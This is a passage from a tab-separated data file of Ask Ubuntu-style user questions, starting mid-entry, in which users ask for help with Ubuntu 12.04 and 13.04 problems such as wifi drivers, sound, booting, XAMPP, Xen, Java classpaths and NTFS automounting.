wl_cfg80211_get_station : could not get rate ( -1 ) [ 2434.373293 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) [ 2435.372913 ] error @ wl_cfg80211_get_station : could not get rate ( -1 ) [ 2435.372917 ] error @ wl_cfg80211_get_station : could not get rssi ( -1 ) details of my wireless card , as suggested by chili555 : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4322 802.11a/b/g/n wireless lan controller [ 14e4:432b ] ( rev 01 ) i tried to pipe dmesg into less and all i could see were similar messages , though occasionally i see `` 10 callbacks supressed '' . is this what is causing my slow boot ? if so , how do i fix this ?
331296	randomly disappearing sound in ubuntu	i 'm currently running xubuntu 13.04 but i 've experienced this issue on other ubuntu distros before as well . while the general issue is having no sound which is usually ( but not always ) resolved with a system restart , xubuntu exhibits some unique behaviour . the description of the symptoms in xubuntu is below ; in other distros the sound just goes off at random without any other symptoms . upon startup , the volume indicator that shows up whenever you change audio volume pops up and almost never goes away . if i click it away , it comes back again . sometimes i see the volume change for a split second and change back . if i go to my sound settings , under the output device `` built in analog stereo '' , i see the `` port '' toggling between analog output and headphones by itself . it toggles it very quickly . eventually , after a while , it seems as though the speakers are muted , but the volume control still shows max volume ( the volume still continues to change by itself but mostly remains at max volume ) . i 've checked alsamixer and already disabled auto mute , but the problem persists . i have never encountered this problem in windows , even up till now . i 've tried different flavours of ubuntu ( linux mint , xubuntu , ubuntu ) and all of them have this issue with sound after a while , though generally those based on newer versions are quicker to produce the sound issues . does anyone have any idea what is wrong and what i can try to fix it ?
331299	brightness doesnot work in ubuntu 13.04	i have installed ubuntu 13.04 in my sony vaio laptop . when i am reducing the brightness it is not working . the brightness remains 100 % all the time even when i am reducing it through system settings . please suggest me how to solve this problem . with thanks , bhaskar
331300	boot from usb in a compaq presario b1800	i just bought a second hand laptop , compaq presario b1800 . currently , it runs windows xp and i want to install ubuntu . i have what i need on my usb but when i go to my bios menu , i can not see the usb drive . i 've seen other posts that said , i need to select fast install , but i just dont see this option on my bios menu .
331303	youtube does n't work well	i replaced windows 8 with ubuntu . but now when i watch youtube videos the video player does not work very well in 1080p . it sometimes does not load or stops and buffers every 30 seconds or so . sometimes the video is slower than the audio . when i press pause it sometimes runs a few seconds longer , also the video is sometimes not running smoothly . all in all it 's a very ugly experience . i hope someone can help me . please keep in mind that i am an unexperienced user . thank you .
331304	installation leads to black screen	i have a new asus f501a-xx385h laptop , with windows 8 preinstalled and intel hd 3000 onboard graphics , which seems to be problematic . no matter what i do , trying to install ubuntu from a usb stick ( the laptop has no optical drive ) leads me to a black screen with no cursor . in fact , choosing any of the options leads to a black screen . secureboot and fastboot are disabled . i have already tried : using two different usb sticks , with either 12.04.2 or 13.04 . i can use them just fine on another computer ( live session starts , etc. ) . curiously , in the new computer i get a black and white , grub-like screen , while in the other i get the usual one with the different options . increasing the screen 's brightness . using different recommended kernel options i have found for other cases ( nomodeset , nolapic , acpi=off , acpi_osi=linux , acpi_backlight=vendor , even i915.modeset=1 and i915.modeset=0 ) . any ideas on how i could fix this ? thank you in advance !
331305	software updater shows no details about the updates	the software updater in ubuntu 13.04 periodically prompts me with a window with no details for the update ( s ) to be installed . it says that 29 kb will be downloaded but i ca n't see the app or package to be updated , therefore i ca n't neither select it nor see it 's changelog or description . i tried to reboot but it 's still the same . how can i install the update in a way which allows me to see some detail ?
331312	wireless problems ubuntu 12.04 edubuntu	i tried to go from normal ubuntu 12.04 to edubuntu 12.04 because i had some problems with my wireless connection . the problem still occurs in edubuntu , the wifi symbol says that i got signal but when i go on the internet , suddenly after a random period of time i cant download/browse anymore but the wifi symbol still says that i got a signal . this problem also occured when i had windows xp with sp3 installed , i thought it was a case of bad drivers but i never really found the solution . iâ´m kind of fed up atm because for the last few days iâ´ve been trying all i can to get my computer to work again under a different os than windows , so far unsuccesfull . i hope someone can help me so i finally will be able to use my laptop ( dell latitude d620 ) again . thanks in advance ! wireless info : 00:00.0 host bridge [ 0600 ] : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub [ 8086:27a0 ] ( rev 03 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller [ 8086:27a2 ] ( rev 03 ) 00:02.1 display controller [ 0380 ] : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller [ 8086:27a6 ] ( rev 03 ) 00:1b.0 audio device [ 0403 ] : intel corporation n10/ich 7 family high definition audio controller [ 8086:27d8 ] ( rev 01 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 1 [ 8086:27d0 ] ( rev 01 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation n10/ich 7 family pci express port 3 [ 8086:27d4 ] ( rev 01 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 1 [ 8086:27c8 ] ( rev 01 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 2 [ 8086:27c9 ] ( rev 01 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 3 [ 8086:27ca ] ( rev 01 ) 00:1d.3 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 4 [ 8086:27cb ] ( rev 01 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb2 ehci controller [ 8086:27cc ] ( rev 01 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev e1 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801gbm ( ich7-m ) lpc interface bridge [ 8086:27b9 ] ( rev 01 ) 00:1f.2 ide interface [ 0101 ] : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] [ 8086:27c4 ] ( rev 01 ) 00:1f.3 smbus [ 0c05 ] : intel corporation n10/ich 7 family smbus controller [ 8086:27da ] ( rev 01 ) 03:01.0 cardbus bridge [ 0607 ] : o2 micro , inc. oz601/6912/711e0 cardbus/smartcardbus controller [ 1217:6972 ] ( rev 40 ) 09:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm5752 gigabit ethernet pci express [ 14e4:1600 ] ( rev 02 ) lsusb : lsusb : bus 001 device 005 : id 0846:9001 netgear , inc. wn111 ( v2 ) rangemax next wireless [ atheros ar9170+ar9101 ] bus 002 device 002 : id 413c : a005 dell computer corp. internal 2.0 hub bus 005 device 002 : id 046d : c016 logitech , inc. optical wheel mouse bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 003 : id 0b97:7761 o2 micro , inc. oz776 1.1 hub bus 002 device 004 : id 0b97:7762 o2 micro , inc. oz776 smartcard reader
331313	how to troubleshoot no audio in game	i installed shatter using the installer i downloaded directly from humblebundle.com and everything worked fine . i then re-installed ubuntu ( same version : 12.04 , fully updated ) and installed shatter through the usc and everything works except the audio ( not even a peep ) . audio in general works perfectly fine -- only shatter has the issue . i really do n't know enough to dig into this myself and that 's the question . how do i troubleshoot this ? ( you know , teach a man to fish and all that ... )
331323	error : environment has no access-key or secret-key	i just installed a juju enviornment , which required me to make this ssh-key prerequisite for later on , ssh-keygen -t rsa -b 2048 but i think i made a fatal error by leaving the file to save the key in empty and not adding a passphrase . i did this since i have n't configured juju yet , also the fact i 'm not familiar with either software . i installed and confiruged juju fine , until i tried to bootstrap , which gave me this fatal error , error : environment has no access-key or secret-key i know this points to this , but how do i point the ssh-key to juju ? here some info about the key from when i created it , if it 's any helpful , your identification has been saved in /home/donovan/.ssh/id_rsa . your public key has been saved in /home/donovan/.ssh/id_rsa.pub . the key fingerprint is : d3 : b5 : ea:0a:29 : d4:05:9b:1e:08 : a9:0e:0e : ca : d6:81
331326	repair bootloader	i need help to repair the bootloader . in this page first option , live usb i have downloaded the iso file and universal usb installer , but at the start the program asks me to choose the file type , and i do n't understand what is the correct file . what should i choose ?
331328	how do install ubuntu over windows7 ?	i have successfully installed ubuntu 12.04 but i did n't see the windows outlined by the numbered installation walk-through : http : //www.ubuntu.com/download/desktop/install-desktop-long-term-support i was never given an option to install ubuntu over windows and wipe it out . how do i achieve this ? i am running a new dell xps with windows 7 premium .
331329	missing compiler error in qtcreator and qt5.1.0 on lubuntu 13.04	i ca n't compile any program in qtcreator on lubuntu 13.04 . i have this error : qtcreator needs a compiler set up to build . configure a compiler in the kit options first of all , i installed from synaptic gcc-mingw32 and mingw32 with dependencies , so the list of downloading packages files looked like this : binutils ( version 2.23.2-2ubuntu1 ) will be installed binutils-mingw-w64-i686 ( version 2.22.90.20120919-0ubuntu1+2 ) will be installed binutils-mingw-w64-x86-64 ( version 2.22.90.20120919-0ubuntu1+2 ) will be installed cpp-4.6 ( version 4.6.4-1ubuntu1 ) will be installed g++-4.6 ( version 4.6.4-1ubuntu1 ) will be installed g++-mingw-w64-i686 ( version 4.6.3-13ubuntu1+8 ) will be installed g++-mingw-w64-x86-64 ( version 4.6.3-13ubuntu1+8 ) will be installed gcc-4.6 ( version 4.6.4-1ubuntu1 ) will be installed gcc-4.6-base ( version 4.6.4-1ubuntu1 ) will be installed gcc-mingw-w64-base ( version 4.6.3-13ubuntu1+8 ) will be installed gcc-mingw-w64-i686 ( version 4.6.3-13ubuntu1+8 ) will be installed gcc-mingw-w64-x86-64 ( version 4.6.3-13ubuntu1+8 ) will be installed gfortran-mingw-w64-i686 ( version 4.6.3-13ubuntu1+8 ) will be installed gfortran-mingw-w64-x86-64 ( version 4.6.3-13ubuntu1+8 ) will be installed libc-dev-bin ( version 2.17-0ubuntu5 ) will be installed libc6-dev ( version 2.17-0ubuntu5 ) will be installed libstdc++6-4.6-dev ( version 4.6.4-1ubuntu1 ) will be installed linux-libc-dev ( version 3.8.0-27.40 ) will be installed manpages-dev ( version 3.44-0ubuntu1 ) will be installed mingw-w64-i686-dev ( version 2.0.3-1 ) will be installed mingw-w64-x86-64-dev ( version 2.0.3-1 ) will be installed mingw32 ( version 4.2.1.dfsg-2ubuntu1 ) will be installed mingw32-binutils ( version 2.20-0.2 ) will be installed mingw32-runtime ( version 3.15.2-0ubuntu1 ) will be installed then i downloaded newest qt 5.1.0 for linux 32-bit from qt-project.org/downloads and i installed it without any problems . in installation options i had checked `` gcc '' . then , i created new project . in kit selection i had default checked `` desktop qt 5.1.0 gcc 32bit '' . i wrote some code , tried to compile it , and i have mentioned error about compiler . i thought qtcreator will detect gcc ( or mingw ) . in options window , section `` build & run '' , tab compilers i have nothing . so i added new compiler gcc and set following file : /home/rafal/qt5.1.0/5.1.0/gcc/bin/qmake but i have no idea if is this the right file . i set abi to : x86 , linux , generic , elf , 32 bit , but also i 'm not sure about it . then , in `` kits '' tab i added new one , and this one has gcc compiler . i set this kit to default . i go back to the code , i try to compile it once again , and then i have this error : 18:03:16 : running steps for project testapp ... 18:03:16 : configuration unchanged , skipping qmake step . 18:03:16 : could not start process `` make '' error while building/deploying project testapp ( kit : desktop qt 5.1.0 gcc 32bit ) when executing step 'make' 18:03:16 : elapsed time : 00:00 . i also installed g++ , and i get the same . and i do n't know what to do . can someone help me , please ? what am i doing wrong ?
331330	unity does not show the application menu	yesterday , i closed the lid of my laptop and it suspended , but today , when open it up , unity does not show the application menu . however , when i open the new application , the application menu is still appears but not for the programmes left open when the system was suspended . these are the images to illustrate my situation , i got these from launchpad , i do n't have the external monitor . i have googled this error but i could n't find any answers . there is one bug report in launchpad which is quite similar [ here ( # 998138 ) ] but this bug is for external monitor , i use only laptop and this bug has not given any solution . my images are also from this bug report . my laptop is a fresh installation of ubuntu 13.04 . would you please show me some ways to fix this problem ? p/s : the terminology `` application menu '' is from the post : what 's the right terminology for unity 's ui elements ?
331331	photo selector api for ubuntu touch	i searched all over the web , but i ca n't find anything that could help me . i am looking for an api to implement a photo selector in my ubuntu touch application . i need something like a file chooser dialog which would allow me to select photo files from across the filesystem . does something like this exist ? ?
331336	ubuntu upgrade problems	i tried to upgrade from ubuntu 12.10 to ubuntu 13.04 . i faced a problem when my internet connection disconnected while the files were downloading . now , i can download all the 600+mb packages again , but i have the already downloaded files stored in /tmp can i restart the download from where it stopped ?
331339	which java installation for linux	in the official website for download i can see two links for jdk for linux . which one should i choose on my ubuntu 12.04 ? http : //javadl.sun.com/webapps/download/autodl ? bundleid=78694 or http : //javadl.sun.com/webapps/download/autodl ? bundleid=78695
331342	simple static ip problem	i have an ethernet device which has the following requirements : persistent ip configuration uses ports : 50000 to 50003 i can set up a static ip4 connection with nm-connection-editor , but i do n't know how to set the following parameters : connection : address netmask gateway ( dns ) camera : address subnet mask thanks in advance .
331343	is possible install ubuntu 13.04 on toshiba m40 ?	when i tried to install ubuntu 12.10 but it was terribly slow . i love ubuntu but i need to know if the computer can support the os or not .
331344	change tooltip color in redmond gtk theme	is there a way to change the tooltip background color by editing the gtkrc file of the redmond theme ? i want to change it to yellow ( it 's gray right now ) .
331351	dual-booted but can not access ubuntu after boot-repair	my main os is windows 7 . today i installed ubuntu 13.04 alongside windows . after successful installation everything seemed right . i could install programs and change system settings etc . however , when i rebooted my computer i had the error : no such device ( grub rescue ) . i 've looked for solutions on several websites . i tried using a boot-repair disk but now i can not access ubuntu any more . it 's like my laptop is not dual-booted any more as i do not have the option to choose the os on start-up . boot info script : http : //paste.ubuntu.com/5974211/
331352	java not finding libraries in classpath	i have a jar file , which has many dependencies ( apachecommons stuff mostly ) . when i put all those jar 's in the same directory as my main jar , everything works fine . but that makes a mess and it also means that people have to carry all those external libraries around whenever they move my program 's jar on their system . so i put them all in a separate directory and added that directory 's path to classpath environment variable ( using /etc/environment ) . now even though echo $ classpath returns that path , still running my jar without those libraries in the same directory causes java.lang.noclassdeffounderror ( which happens when it ca n't find external jars needed ) . any help/ideas would be highly appreciated .
331353	how to replace windows with ubuntu ?	my laptop is filled with viruses and windows xp is just becoming impossible to work . i 've been interested in ubuntu for a while , so , would i be able to use something like debian to clear my hdd and os and then install ubuntu and start fresh ?
331368	ubuntu 13.04 , xen , xcp-xapi - operation not permitted ?	i 've installed ubuntu 13.04 onto my machine , along with `` xpc-xapi '' , which installs everything needed . by default , this installs xen using the default toolstack `` xm '' . i applied enough system tweaks to get the `` xapi '' toolstack in place . i 'm supposing i did that much correctly , because sudo xe vm-list successfully reported the dom0 system . for my next move , i wanted to install an ubuntu 13.04 guest , but have n't yet managed to succeed . in a jumble of confusion , i simply used wget to drop a copy of the ubuntu 13.04 iso into my `` iso storage '' , and , i somehow created a 16gb logical partition for my vhd storage . i installed openxenmanager onto another system , set root 's password for the dom0 , connected to dom0 , and ( 1 ) created a pool ( 2 ) created a vm ( 3 ) failed at starting the vm . the error reported is this : # line 1 ==== the server failed to handle your request , due to an internal error . the given message may give details useful for debugging the problem . # line 2 ==== message : xenctrl.error [ memory 31340308 kib free ; to be scrubbed 0 kib ; total 32702 mib ] : 1 : operation not permitted the only lead i 've found about this `` operation not permitted '' message was in this xen mailing list thread . first noted in february , then mentioned again in may . several questions are on the table then . ( 1 ) did i even install xen + xcp-xapi correctly ? ( 2 ) after sudo xe vm-list works , and storage repositories for disks and isos are created , did i possibly miss doing some other configuration ( s ) before trying to create and start a vm ? ( 3 ) which operation was not permitted ? ( i 'm guessing `` vm-start '' ) and why ? ( 4 ) are `` pools '' necessary ? ( 5 ) another thing that surprises me was the -1 values in the iso storage repository ... is that correct and normal ? uuid ( ro ) : 949eac57-5642-75f0-3b59-112c57f6e3eb name-label ( rw ) : localisorepository name-description ( rw ) : host ( ro ) : kickseed allowed-operations ( sro ) : forget ; vdi.create ; plug ; destroy ; vdi.destroy ; scan ; vdi.clone ; unplug current-operations ( sro ) : vdis ( sro ) : fa8428ff-8d52-45d3-a130-72de2cf1be07 pbds ( sro ) : 9bfb36a8-ec37-7d2c-4e2c-fab14d9931ca virtual-allocation ( ro ) : 0 physical-utilisation ( ro ) : -1 physical-size ( ro ) : -1 type ( ro ) : iso content-type ( ro ) : iso shared ( rw ) : true introduced-by ( ro ) : other-config ( mrw ) : sm-config ( mro ) : blobs ( ro ) : local-cache-enabled ( ro ) : false tags ( srw ) : i also tried to create and start a vm fully manually ( the parts after getting a base os and xapi in place ) , using centos as the intended guest os , as outlined in this guide , with exactly the same result .
331371	how does the automatic installation work with free space ?	i want to install ubuntu 13.04 ( raring ringtail ) i have windows 7 installed , so i unallocated some disk space ( ~20gb ) . i have used other versions of ubuntu and in those versions there was an option `` use free space '' and if i check that option it installs ubuntu in the free space . now for the installation of ubuntu 13.04 there are just 3 options which are `` install alongside windows 7 '' , `` remove windows 7 and install ubuntu '' and `` something else '' so my query is , if i select the `` install alongside windows 7 '' option does it automatically install ubuntu into the unallocated space ?
331373	wine errors in ubuntu 12.10 driving me crazy	i have an hp pavilion dv7 64bit system , 6gb memory , ubuntu 12.10 partitioned with win7 , amd phenom ( tm ) ii n640 dual-core processor ă 2 , 650g hdd . this is what i 'm getting through terminal , same type of warning when going through software center . i 've tried re-installing os and it is maddening ! chris @ ubuntu : ~ $ sudo apt-get install wine [ sudo ] password for chris : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.4 but it is not going to be installed e : unable to correct problems , you have held broken packages . the following is the warning from software center : the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.7ubuntu6 is to be installed depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu20.1 is to be installed depends : wine1.4-amd64 ( = 1.4.1-0ubuntu1 ) but 1.4.1-0ubuntu1 is to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu1 ) but it is not going to be installed
331374	why is my hdmi audio not recognized ?	on a previous installation my audio for hdmi did work , but on a fresh new install of ubuntu desktop 13.04 my hdmi is not detected . my goal is to get hdmi + analog audio simultaneously . i am using pulse audio with paprefs to get both of the audio devices playing together . it did not work because it did not find my hdmi audio at all . this is what i tried in a terminal window : htpc @ htpc : ~ $ aplay -l **** lijst van playback hardware-apparaten **** kaart 0 : generic [ hd-audio generic ] , apparaat 3 : hdmi 0 [ hdmi 0 ] sub-apparaten : 1/1 sub-apparaat # 0 : subdevice # 0 kaart 1 : generic_1 [ hd-audio generic ] , apparaat 0 : alc892 analog [ alc892 analog ] sub-apparaten : 1/1 sub-apparaat # 0 : subdevice # 0 kaart 1 : generic_1 [ hd-audio generic ] , apparaat 1 : alc892 digital [ alc892 digital ] sub-apparaten : 1/1 sub-apparaat # 0 : subdevice # 0 htpc @ htpc : ~ $ speaker-test -c 2 -r 48000 -d hw:0,3 speaker-test 1.0.25 playback device is hw:0,3 stream parameters are 48000hz , s16_le , 2 channels using 16 octaves of pink noise playback open error : -19 , onjuist apparaat i think this means my hdmi audio is detected but it can not play for some reason . why is this ?
331377	lowering cpu load average , kubuntu 12.04	i 've got a question about lowering cpu loads , if i understand correctly when i issue the 'uptime ' command i get 3 values representing 5 , 10 and 15 minutes of average cpu load . my current stats are around : load average : 0.57 , 0.72 , 1.42 offcourse they fluctuate but the 15min value is always between 1.40-1.80 , from what i understand everything above 1.00 is not okay . my specs are : intel ( r ) celeron ( r ) d cpu 3.20ghz single core processor 1gb ram , 1gb swap , 512mb zram : filename type size used priority /dev/sdb7 partition 3004116 129688 -1 /dev/zram0 partition 480316 2212 100 kubuntu 12.04 is on a 80gb drive with about 35gb used , this is the os and programs , all files i work with or download are located on another drive . when i issue 'top ' i can see no big activity from the systems deamons and background processes . its mostly the browsers , gimp and stuff like eclipse and codeblocks that take up a lot of memory . but i mostly dont run more than 2 programs together anyway . also i 've disabled window animations and effects . the system also responds , reads and write at a good speed . so how can i have such a high average ? and are there any more tools to get more info and control over cpu processes ? i know i could better switch to lubuntu for this pc , but like i said before performance is actually quite good . and its very stable so far i 've had no big problems . and i 'd like to know this when i upgrade to a better system again . you can find my complete lshw in html output : http : //bitbytes.freevar.com/webshared/sysinfo.htm greets , rob
331380	how to take modified code over to installed system ?	have modified the code of a bash-command - now i want to take it over into system of 12.10 ( it is done with downloaded source code of this bash-command ) . is there nothing more necessary than this : ./configure make make install do i have to do something addtional or is this already completed and the modified code is already merged into the system ?
331384	ubuntu one message we are sorry , but while our system updates your account ... for weeks	every time i logon ubuntu one and want to change some settings i see the following message : we are sorry , but while our system updates your account , you can not see details of or make changes to your subscriptions . this can take up to two hours to complete , but in the meantime you can use your new services . i get this message for weeks now and three times i tried to contact support . i have still no reply . anyone an idea what is going on ? i want to activate music stream but i am not able to .
331385	apache wo n't start in xampp	i 'm trying to start xampp server via : $ sudo /opt/lampp/lampp start get me : starting xampp for linux 1.8.3-0 ... xampp : starting apache ... fail . xampp : another web server is already running . xampp : starting mysql ... ok. xampp : starting proftpd ... ok. as you can see above , all packages run successfully except apache . please tell me what to do ? edit : the netstat -a -no output was a long file and i saved it on a third-party site .
331388	madcatz rat 3 mouse issues	i 'm having issues with configuring my madcatz rat 3 mouse with ubuntu 13.04 . it 's like the mouse is having issues with switching between windows . movement works fine though . i have added this to my xorg.conf but it still does n't work : section `` inputclass '' identifier `` mouse remap '' matchproduct `` madcatz mad catz r.a.t.3 mouse '' matchdevicepath `` /dev/input/event* '' option `` buttonmapping '' `` 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 0 0 0 '' endsection here is some more info . from xinput list : madcatz mad catz r.a.t.3 mouse id=13 [ slave pointer ( 2 ) ] more details : niel @ niel-vpcf13m1e : ~ $ xinput query-state 13 2 classes : buttonclass button [ 1 ] =up button [ 2 ] =up button [ 3 ] =up button [ 4 ] =up button [ 5 ] =up button [ 6 ] =up button [ 7 ] =up button [ 8 ] =up button [ 9 ] =up button [ 10 ] =down button [ 11 ] =up button [ 12 ] =up button [ 13 ] =up button [ 14 ] =up button [ 15 ] =up button [ 16 ] =up button [ 17 ] =up button [ 18 ] =up valuatorclass mode=relative proximity=in valuator [ 0 ] =512 valuator [ 1 ] =762 valuator [ 2 ] =-7 cat /proc/bus/input/devices i : bus=0003 vendor=0738 product=1703 version=0100 n : name= '' madcatz mad catz r.a.t.3 mouse '' p : phys=usb-0000:05:00.0-1/input0 s : sysfs=/devices/pci0000:00/0000:00:1c.5/0000:05:00.0/usb3/3-1/3-1:1.0/input/input18 u : uniq= h : handlers=mouse3 event15 b : prop=0 b : ev=17 b : key=3ff0000 0 0 0 0 b : rel=103 b : msc=10 anyone knows how to fix this ? thanks !
331389	can not change lock dialog in ubuntu 13.04	i 'm using ubuntu 13.04 raring and when i want to change the lock dialog i was unable to find /usr/shared/gnome-screensaver nor any other files mentioned on the internet that includes : /usr/shared/gnome-screensave ~/.gconf/apps/gnome-screensaver/ or any file/folder that contains `` screenserver '' other than a folder in /usr/shared/doc/gnome-screenserver and i installed the gconf-editor tool i did n't find /apps/gnome-screensave/lock_dialog_theme
331390	latest ubuntu 12.04 kernel 3.2.0-51 does not boot graphical	i can run it in safe mode and get the root prompt , but if i let it boot normally i just get a black screen . a similar question was asked here : pc does not restart after last kernel update but i do n't have a nvidia graphics card . i am able to boot 3.2.0-43 just fine . i did find this error in the kernel.log after trying to boot 3.2.0-51 : aug 11 12:03:26 iceman kernel : [ 2.672181 ] [ drm ] mtrr allocation failed . graphics performance may suffer .
331393	is it possible to print to a brother mfc-490cw that is conected to a lan	i have a brother mfc-490cw printer that is connected to my lan ( wireless ) and on which i can print with fine from windows . from ubuntu however , it does not seem to be possible . i downloaded and installed cups and lpd drivers from the brother site and installed them . i get a brother printer that says it is connected via usb . if i search for a network printer , my printer is shown . if i select it and select the correct driver , i can submit test pages . these pages are however not printed . what could be wrong . should it really be that much harder then it is on windows ?
331394	os : boot-up linux	bought a laptop with the os `` boot-up linux '' . how can i install ubuntu / which instructions should i follow ? i have installed ubuntu on a windows pc before but this laptop ( as mentioned before ) only has `` boot-up linux ''
331396	ubuntu touch apps	is there a `` native '' skype , facebook , google maps , google hangouts , ebook reader apps being developed for ubuntu touch ? if yes , whats their status ? and if no , why ? thank you !
331397	will installing ubuntu using the `` erase entire disk '' option remove and erase all currently existing partitions ?	i 'm considering ditching windows 8 and doing a fully clean install of ubuntu . however , i 'm concerned because my computer came with a built-in 16 gb recovery partition that would need to be erased as well . if i pick the `` erase entire disk '' option during installation , will it wipe out this recovery partition too ?
331399	change xfce panel launcher icon size	i have a panel size of 24 pixels and am trying to make xfce feel like gnome2 . just the launcher icons appear to be like 14,14 when i would want them 22,22 or thereabouts . does anyone know where to set this ?
331402	ubuntu 12 . 04 android studio will not load	android studio 0.2.2 wo n't load with jdk-8 ( build 1.8.0-ea-b102 ) on a samsung arm chromebook with 32 bit ubuntu12.04 . i have tried older jdks no luck . /downloads/android-studio/bin $ ./studio.sh warning : you are launching the ide using openjdk java runtime . its known to have performance and graphics issues ! switch to the oracle ( sun ) jdk before reporting problems ! note : if you have both oracle ( sun ) jdk and openjdk installed please validate either studio_jdk , jdk_home , or java_home environment variable points to valid oracle ( sun ) jdk installation . see http : //ow.ly/6tukq for more info on switching default jdk . press enter to continue .
331403	no ubuntu touch templates in qt 5.0.2	i have been using qt for some time now ( lastly qt 4.8 ) , writing some desktop apps . now i wanted to try doing something on ubuntu touch and so i installed the ubuntu sdk . what i did was uninstall my regular qt version that i had ( so as not to create any conflict ) and ran the sdk ppa everything installed fine it seemed . no errors warnings or dependencies issues and i indeed have a qt creator with the ubuntu sdk . also i now have version 5.0.2 so all seems fine . except i do not have any kind of ubuntu touch templates . only the qt desktop templates . i am running a ubuntu 13.04 32 bit machine . as a test , i installed the ubuntu sdk on a virtual ( box ) machine ( 64 bit ubuntu 13.04 ) and here i do have the ubuntu touch templates installed . ( note : i dont want to run it in a virtual environment as there are opengl issues in virtualbox which causes qmlscene to crash , but that is another issue ) . also : i am aware of this and this issue and they do not resolve things . any ideas anyone ?
331405	openvpn connects but does n't access any sites on ubuntu 12.04	i run my own vps/openvpn server , and everything is configured correctly . i can connect on opensuse ( kde version ) and ubuntu 13.04 , but it does n't work in ubuntu 12.04 . it connects but does n't access any sites . i configured it exactly as i did in ubuntu 13.04 . additional info : i installed openvpn , network-manager-openvpn and network-manager-openvpn-gnome . setup the connection with user.crt , ca.crt and user.key ( it does n't have user or password ) , and activated lzo ( exactly how i did in ubuntu 13.04 ) . any ideas ?
331406	need some urgent suggestion - windows disks inaccessible after ubuntu installation	this is my first time using ubuntu . i wanted to dual boot windows 8 and ubuntu 13.04 on my dell inspiron 5521 laptop . i was doing everything according to a tutorial i 've seen . at one point it asked me about what i should do . it had 4 options and the last option was something else . i clicked on the option called lvm . after this the install was good , but to my horror now i can not find windows or any of my files anywhere . please some urgent help is required . these files are very urgently needed . thank you . these are the results of running sudo fdisk -l in the terminal :
331407	xampp ( lampp ) 's phpmyadmin throwing error # 2002	i have just installed xampp ( lampp ) about a hour ago and i am continously searching for the error i am getting on while opening http : //localhost/phpmyadmin ( phpmyadmin ) . the screen of the error is as follows : so how can i resolve the error ? i searched on the net and found that my mysql.sock file is missing but i am not getting on how to fix that issue . so how can i bring my mysql.sock file back ? thanks in advance : )
331408	live usb stopped working	i had 13.04 32bit running great on a sandisk extreme usb 3.0 64gb stick . for the most part i use it on a toshiba portege laptop but sometimes on various desktops as well . i set the usb drive up with unetbootin , i split the drive into roughly two 30gb partitions following this thread http : //www.howtogeek.com/97177/how-to-put-ubuntu-linux-on-a-usb-thumb-drive-without-the-mess/ so that i could use it as a thumb-drive as well . i also partitioned the live install section following this thread https : //wiki.ubuntu.com/liveusbpendrivepersistent so that i would have a larger persistence drive . i also bypassed the unetbootin install or run screen following this thread how to bypass `` try it / install '' screen when booting from usb live session ? ( without installing in the usb ) all of this worked great and i was a bit proud of myself as i am relatively new to linux and well ... i had a nice usb thumb drive that worked great for standard file storage and swapping , plus a killer install of ubuntu that ran very fast , loaded right up to the sign in desktop and functioned perfectly ! then last night i tried to boot up the toshiba laptop and i found myself staring at the purple loading screen with ubuntu in the center and the little progress squares lighting up from once side to the other under it . it hangs there indefinitely . i 've tried it on several systems and i get the same results . here the error message : i really do not want to start from scratch as i have the install customized the way i like , loaded with software i want and all set up to my tastes . does anyone have any suggestions on how to fix the problem , or for that matter what the actual problem is ?
331411	are there any synchronization apis in ubuntu touch yet ? ( contacts/calendar/ ... )	just wondering if there are any apis to read/write contacts/calendar/installed apps/ ... yet . i thought about writing an owncloud sync app for the showdown that should be able to synchronize all that across devices , but now i 'm not sure if this is even possible on ubuntu touch yet . at least i could n't find any documentation on these cases . otherwise it might just be a file-sync ( hello , ubuntu one ? ) app that can display the owncloud calendar/contacts , but can not integrate into the system as good . regards , adrian
331420	automount ntfs partition like nautilus do	i have an ntfs partition that i want to automatically mount so i do not have to open nautilus and click on it under devices . if i mount with nautilus , and then type mount , i see the following line : /dev/sdb1 on /media/data type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) i am the owner of all files and permissions are the way i want them ( have umask 077 in .bashrc ) . however , after following the instructions on mountingwindowspartitions , and adding the following line to fstab uuid=4a92c07a92c06c4f /media/data ntfs-3g defaults , windows_names , locale=en_gb.utf8 0 0 the drive does indeed automatically mount , but all file permissions are -rwxrwxrwx and user and group are both root . the mount command now shows /dev/sdb1 on /media/data type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) how do i specify the parameters in fstab so that the partition is mounted exaclty the same way as when i click on the device under devices in nautilus ? i have ubuntu 12.04 .
